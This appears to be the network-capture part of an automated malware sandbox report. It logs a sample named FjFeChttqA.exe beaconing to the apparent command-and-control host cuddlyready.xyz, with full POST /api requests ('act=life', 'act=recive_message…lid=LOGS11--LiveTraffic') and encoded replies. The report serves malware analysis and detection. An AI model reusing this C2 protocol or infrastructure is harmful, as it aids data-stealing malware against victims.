                                                                                                              Dec 23, 2024 08:35:11.429544926 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.429688931 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.429704905 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.429721117 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.429725885 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.624798059 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.624910116 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.625026941 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.625449896 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.625488043 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:12.837354898 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:12.837500095 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:12.868347883 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:12.868383884 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:12.868731976 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:12.869982004 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:12.870122910 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:12.870151043 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:13.877842903 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:13.877935886 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:13.878123045 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:13.878237963 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:13.878262997 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:13.994452000 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:13.994499922 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:13.994596004 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:13.994910002 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:13.994924068 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:15.205986023 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:15.206047058 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:15.207612991 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:15.207626104 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:15.207918882 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:15.209073067 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:15.209233999 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:15.209254980 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:15.209297895 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:15.255331993 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:16.157886982 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:16.157979012 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:16.158145905 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:16.158493996 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:16.158514977 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:16.366607904 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:16.366664886 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:16.366766930 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:16.367063999 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:16.367074013 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:17.578216076 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:17.578298092 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:17.579574108 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:17.579588890 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:17.579819918 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:17.580935001 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:17.581057072 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:17.581078053 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:17.581149101 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:17.581160069 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:18.541824102 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:18.541925907 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:18.541980982 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:18.542120934 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:18.542139053 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:19.061124086 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:19.061171055 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:19.061256886 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:19.061742067 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:19.061762094 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:20.274827957 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:20.274938107 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:20.276297092 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:20.276308060 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:20.276693106 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:20.278469086 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:20.278578997 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:20.278583050 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:20.955384016 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:20.955487967 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:20.955590963 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:20.959192991 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:20.959208012 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:21.548125029 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:21.548170090 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:21.548242092 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:21.548549891 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:21.548563004 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.759706020 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.759799957 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.761528969 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.761539936 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.761792898 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.763276100 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.764065981 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.764103889 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.764390945 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.764425039 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.764621019 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.764661074 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.765762091 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.765791893 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.766028881 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.766056061 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.766208887 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.766227961 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.766235113 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.766242981 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.766377926 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.766397953 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.766419888 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.768100023 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.768136024 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.807324886 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.807531118 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.807585001 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.807616949 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.807634115 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.807673931 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.807703018 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:26.507791996 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:26.507886887 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:26.508162975 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:26.508196115 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:26.508212090 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:26.543575048 CET49722443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:26.543627024 CET44349722172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:26.543719053 CET49722443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:26.544054031 CET49722443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:26.544069052 CET44349722172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:27.066777945 CET49722443192.168.2.5172.67.150.173
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 23, 2024 08:35:07.092896938 CET5618253192.168.2.51.1.1.1
                                                                                                              Dec 23, 2024 08:35:07.230468035 CET53561821.1.1.1192.168.2.5
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 23, 2024 08:35:07.092896938 CET192.168.2.51.1.1.10x624eStandard query (0)cuddlyready.xyzA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 23, 2024 08:35:07.230468035 CET1.1.1.1192.168.2.50x624eNo error (0)cuddlyready.xyz172.67.150.173A (IP address)IN (0x0001)false
                                                                                                              Dec 23, 2024 08:35:07.230468035 CET1.1.1.1192.168.2.50x624eNo error (0)cuddlyready.xyz104.21.32.96A (IP address)IN (0x0001)false
                                                                                                              • cuddlyready.xyz
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.549704172.67.150.1734435568C:\Users\user\Desktop\FjFeChttqA.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-23 07:35:08 UTC262OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 8
                                                                                                              Host: cuddlyready.xyz
                                                                                                              2024-12-23 07:35:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                              Data Ascii: act=life
                                                                                                              2024-12-23 07:35:09 UTC1131INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 23 Dec 2024 07:35:09 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=sk4sip6caji4bgsvkb5cn29tkr; expires=Fri, 18 Apr 2025 01:21:47 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Anw%2BT8w4ceJXwnUzQwXXMQi72A1ay6XaOI8DIYgb43Ydk3oqBQhwY3W5nlAmWJ0BH1T5vw7niPP5kmTl6o%2Fux5s8%2BeMz9MZKZnhYQ5KkJ08uSL7vj%2F38N%2Fd85w%2B%2BLpe60fo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f66ac57893dc431-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1508&min_rtt=1503&rtt_var=574&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1891191&cwnd=229&unsent_bytes=0&cid=acb1fb7888e70a33&ts=788&x=0"
                                                                                                              2024-12-23 07:35:09 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                              Data Ascii: 2ok
                                                                                                              2024-12-23 07:35:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.549705172.67.150.1734435568C:\Users\user\Desktop\FjFeChttqA.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-23 07:35:10 UTC263OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 53
                                                                                                              Host: cuddlyready.xyz
                                                                                                              2024-12-23 07:35:10 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                              2024-12-23 07:35:11 UTC1125INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 23 Dec 2024 07:35:11 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=4v12ulpekehk31rljomla4ov02; expires=Fri, 18 Apr 2025 01:21:49 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u9IrEMAj%2F4WJSSwijV19zMBVgW23N1BxBCVomDGq7yNNpF1e9mG6esHHObzW39ZHxWC9GN4%2BWBNWNMDqYEUWoUrREOdXcLF1Lm2Pfs%2FT5vI2%2B9l1gFPPZCX7zSSKFpZHg18%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f66ac641f53de96-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1474&rtt_var=562&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1931216&cwnd=224&unsent_bytes=0&cid=a13bdf4954ff7b33&ts=780&x=0"
                                                                                                              2024-12-23 07:35:11 UTC244INData Raw: 34 36 63 0d 0a 71 2f 30 4e 56 78 41 64 77 79 6c 43 67 6f 2b 56 52 57 43 6b 65 69 6a 6d 67 46 63 45 38 67 71 4f 6f 6d 4e 38 6f 6c 48 66 6b 47 58 51 33 33 74 31 4b 69 6e 76 43 7a 48 6e 72 61 38 78 45 74 45 66 42 4d 54 68 4d 79 62 49 62 4f 2f 4f 45 42 6d 4f 63 36 6e 39 52 35 47 62 62 44 74 6a 65 4f 38 4c 4a 2f 71 74 72 78 34 62 68 68 39 47 78 4c 70 31 59 5a 68 6f 37 38 34 42 48 63 6b 2b 72 2f 77 47 77 35 46 71 50 33 56 2b 70 30 67 75 37 2b 72 77 49 41 48 4f 46 45 47 4c 36 44 6f 6d 33 69 6a 72 32 45 46 47 67 42 79 36 35 41 54 6d 6e 48 34 38 4d 6d 44 76 55 6d 44 6e 34 62 64 2f 51 73 55 66 53 6f 72 6d 4d 32 2b 61 59 75 62 47 41 42 6a 49 49 62 62 32 44 63 4f 66 61 54 35 2f 64 37 4e 46 4a 4f 6a 68 39 69 6f 42 68 6c 59 4b 67 2f 70
                                                                                                              Data Ascii: 46cq/0NVxAdwylCgo+VRWCkeijmgFcE8gqOomN8olHfkGXQ33t1KinvCzHnra8xEtEfBMThMybIbO/OEBmOc6n9R5GbbDtjeO8LJ/qtrx4bhh9GxLp1YZho784BHck+r/wGw5FqP3V+p0gu7+rwIAHOFEGL6Dom3ijr2EFGgBy65ATmnH48MmDvUmDn4bd/QsUfSormM2+aYubGABjIIbb2DcOfaT5/d7NFJOjh9ioBhlYKg/p
                                                                                                              2024-12-23 07:35:11 UTC895INData Raw: 31 50 74 41 37 33 73 4d 51 44 39 55 2b 72 66 52 48 31 74 46 32 64 58 56 7a 34 52 4e 67 36 4f 48 35 49 67 48 4a 48 30 75 45 38 44 70 6d 6b 32 44 6b 78 41 73 52 7a 7a 79 7a 2b 41 44 42 6c 6d 67 36 64 58 65 6e 52 43 4f 67 6f 37 63 67 47 6f 5a 41 43 71 54 79 4e 6d 57 45 5a 66 32 41 48 6c 44 5a 63 37 72 2b 52 35 48 66 61 54 74 7a 63 71 46 5a 4b 4f 76 6d 38 6a 55 4a 7a 78 56 48 68 4f 38 2f 61 5a 4e 6f 36 38 6f 4c 45 63 6f 33 73 50 38 42 79 5a 38 76 65 7a 4a 34 75 51 74 34 6f 4d 37 79 4e 77 58 4b 44 67 69 2b 6f 69 6f 6f 69 53 6a 72 7a 45 46 47 67 44 75 34 38 51 54 43 6b 47 77 39 65 57 32 68 57 53 62 74 36 4f 55 68 42 38 67 53 53 5a 62 6f 4f 32 43 54 59 65 66 4a 42 42 6e 45 63 2f 4f 79 41 4e 48 66 4e 33 56 54 63 71 70 48 4b 76 66 74 74 7a 68 4d 33 31 68 4e 69 4b
                                                                                                              Data Ascii: 1PtA73sMQD9U+rfRH1tF2dXVz4RNg6OH5IgHJH0uE8Dpmk2DkxAsRzzyz+ADBlmg6dXenRCOgo7cgGoZACqTyNmWEZf2AHlDZc7r+R5HfaTtzcqFZKOvm8jUJzxVHhO8/aZNo68oLEco3sP8ByZ8vezJ4uQt4oM7yNwXKDgi+oiooiSjrzEFGgDu48QTCkGw9eW2hWSbt6OUhB8gSSZboO2CTYefJBBnEc/OyANHfN3VTcqpHKvfttzhM31hNiK
                                                                                                              2024-12-23 07:35:11 UTC1369INData Raw: 34 34 62 30 0d 0a 69 75 55 6a 4a 6f 38 6d 39 59 41 47 45 6f 42 72 2f 66 30 49 78 70 64 76 4e 48 5a 79 70 55 6f 74 37 4f 54 30 4b 77 37 4f 46 55 61 41 37 54 31 75 6b 32 44 2b 7a 67 38 59 78 6a 4f 34 73 6b 6d 4a 6d 48 64 31 4b 6a 2b 46 52 54 66 30 35 72 55 53 41 63 67 57 54 5a 4b 69 4b 69 69 4a 4b 4f 76 4d 51 55 61 41 50 62 44 35 43 38 36 57 62 6a 5a 79 64 61 39 45 4b 75 6a 6c 39 79 6f 44 7a 52 42 4d 69 65 6b 36 61 5a 64 67 37 38 77 45 45 38 4e 7a 38 37 49 41 30 64 38 33 64 56 64 78 6f 6c 6f 78 6f 74 6a 30 4b 51 7a 42 44 67 71 62 72 43 77 6d 6c 32 53 73 6d 45 45 55 78 7a 53 35 2f 77 33 4b 6d 32 73 34 66 58 61 6f 51 6a 4c 71 34 66 6b 31 44 38 77 64 52 49 6a 6e 4f 6d 61 52 61 65 4c 4b 43 6c 36 4f 63 37 72 71 52 35 48 66 51 44 68 69 62 61 74 41 4d 61 4c 59 39
                                                                                                              Data Ascii: 44b0iuUjJo8m9YAGEoBr/f0IxpdvNHZypUot7OT0Kw7OFUaA7T1uk2D+zg8YxjO4skmJmHd1Kj+FRTf05rUSAcgWTZKiKiiJKOvMQUaAPbD5C86WbjZyda9EKujl9yoDzRBMiek6aZdg78wEE8Nz87IA0d83dVdxoloxotj0KQzBDgqbrCwml2SsmEEUxzS5/w3Km2s4fXaoQjLq4fk1D8wdRIjnOmaRaeLKCl6Oc7rqR5HfQDhibatAMaLY9
                                                                                                              2024-12-23 07:35:11 UTC1369INData Raw: 41 43 71 76 68 49 32 7a 51 64 36 4c 5a 51 52 6e 4d 63 2b 57 79 44 63 57 62 62 44 6c 37 63 36 78 4b 4a 4f 66 67 38 79 63 45 77 42 31 4c 6a 2b 6f 35 61 5a 70 6b 36 4d 77 49 47 4d 77 77 76 76 52 48 68 39 39 6f 4c 54 49 6e 34 57 6f 74 36 2b 48 33 4a 42 50 42 57 41 54 45 37 44 4e 6d 30 44 44 36 30 42 59 5a 33 33 32 6b 73 67 44 46 33 7a 64 31 65 47 32 6b 52 53 54 71 36 50 4d 72 43 4d 59 64 57 49 7a 6b 4d 6d 71 59 62 65 50 47 42 42 50 48 4f 4c 37 67 46 63 71 62 59 54 6b 79 4d 65 46 4d 4f 4b 43 31 74 77 49 56 78 51 68 4d 68 36 49 71 4b 49 6b 6f 36 38 78 42 52 6f 41 7a 73 2f 34 4d 7a 70 52 6b 4d 58 5a 2f 72 45 41 75 37 75 54 37 4c 77 37 42 43 6b 65 42 36 6a 39 76 6c 57 54 68 77 78 4d 64 77 58 50 7a 73 67 44 52 33 7a 64 31 56 55 79 57 61 47 44 2f 6f 2b 35 6e 42 63
                                                                                                              Data Ascii: ACqvhI2zQd6LZQRnMc+WyDcWbbDl7c6xKJOfg8ycEwB1Lj+o5aZpk6MwIGMwwvvRHh99oLTIn4Wot6+H3JBPBWATE7DNm0DD60BYZ332ksgDF3zd1eG2kRSTq6PMrCMYdWIzkMmqYbePGBBPHOL7gFcqbYTkyMeFMOKC1twIVxQhMh6IqKIko68xBRoAzs/4MzpRkMXZ/rEAu7uT7Lw7BCkeB6j9vlWThwxMdwXPzsgDR3zd1VUyWaGD/o+5nBc
                                                                                                              2024-12-23 07:35:11 UTC1369INData Raw: 7a 6a 5a 70 6d 79 6a 7a 6a 68 68 65 78 7a 2f 39 71 6b 66 4f 6c 32 63 37 63 58 6d 71 52 79 7a 68 35 50 45 69 43 73 45 58 54 59 33 6c 4e 57 43 43 62 2b 48 4a 41 52 58 4a 4f 62 6e 7a 44 49 6e 52 4c 7a 4a 71 50 2f 6b 4c 45 75 66 37 35 79 52 43 32 56 5a 54 78 4f 55 35 4a 73 67 6f 34 64 49 41 47 39 49 33 73 76 6b 56 77 70 6c 76 4d 47 42 34 72 55 45 76 34 2b 58 36 4a 41 72 55 47 45 65 45 38 43 64 67 6d 32 61 73 6a 6b 45 5a 32 48 50 6c 73 6a 62 65 6c 43 38 71 50 47 62 68 54 43 79 67 74 62 63 6b 43 4d 73 57 57 49 44 6b 50 6d 57 65 59 4f 6e 49 42 52 54 4e 50 4c 62 34 44 73 47 66 59 44 42 36 64 4b 64 46 49 65 62 68 2b 6d 64 4d 68 68 39 53 78 4c 70 31 51 59 70 6c 36 74 63 51 4b 38 63 7a 37 4c 49 59 68 34 59 76 4d 6e 34 2f 2b 51 73 74 37 4f 66 36 49 67 62 4f 48 30 6d
                                                                                                              Data Ascii: zjZpmyjzjhhexz/9qkfOl2c7cXmqRyzh5PEiCsEXTY3lNWCCb+HJARXJObnzDInRLzJqP/kLEuf75yRC2VZTxOU5Jsgo4dIAG9I3svkVwplvMGB4rUEv4+X6JArUGEeE8Cdgm2asjkEZ2HPlsjbelC8qPGbhTCygtbckCMsWWIDkPmWeYOnIBRTNPLb4DsGfYDB6dKdFIebh+mdMhh9SxLp1QYpl6tcQK8cz7LIYh4YvMn4/+Qst7Of6IgbOH0m
                                                                                                              2024-12-23 07:35:11 UTC1369INData Raw: 70 64 6b 72 4a 68 42 45 4d 30 31 76 50 4d 50 77 5a 39 70 50 33 5a 38 71 45 67 6e 36 65 76 38 4a 41 6a 4a 48 30 79 41 34 6a 35 68 6e 6d 37 70 79 77 68 65 6a 6e 4f 36 36 6b 65 52 33 30 6b 57 59 47 32 54 52 53 50 37 72 65 68 70 47 34 59 66 52 73 53 36 64 57 32 59 5a 2f 37 46 43 42 62 45 4f 72 33 32 44 63 53 59 62 7a 42 2f 65 71 56 46 4a 4f 66 74 2b 79 67 46 7a 68 64 4f 68 4f 31 31 4b 4e 42 76 39 49 42 5a 58 75 41 34 71 39 4d 4a 77 6f 30 76 4b 6a 78 6d 34 55 77 73 6f 4c 57 33 4b 51 76 48 45 45 53 49 36 6a 46 30 6b 47 50 6c 7a 77 41 52 77 44 43 38 2b 41 2f 62 6d 57 38 2b 65 6e 69 70 54 79 37 79 37 50 68 6e 54 49 59 66 55 73 53 36 64 56 65 47 62 2b 76 50 51 7a 66 48 4b 4c 7a 34 42 4d 4b 54 4c 79 6f 38 5a 75 46 4d 4c 4b 43 31 74 79 6f 4f 79 78 78 59 69 4f 49 31
                                                                                                              Data Ascii: pdkrJhBEM01vPMPwZ9pP3Z8qEgn6ev8JAjJH0yA4j5hnm7pywhejnO66keR30kWYG2TRSP7rehpG4YfRsS6dW2YZ/7FCBbEOr32DcSYbzB/eqVFJOft+ygFzhdOhO11KNBv9IBZXuA4q9MJwo0vKjxm4UwsoLW3KQvHEESI6jF0kGPlzwARwDC8+A/bmW8+enipTy7y7PhnTIYfUsS6dVeGb+vPQzfHKLz4BMKTLyo8ZuFMLKC1tyoOyxxYiOI1
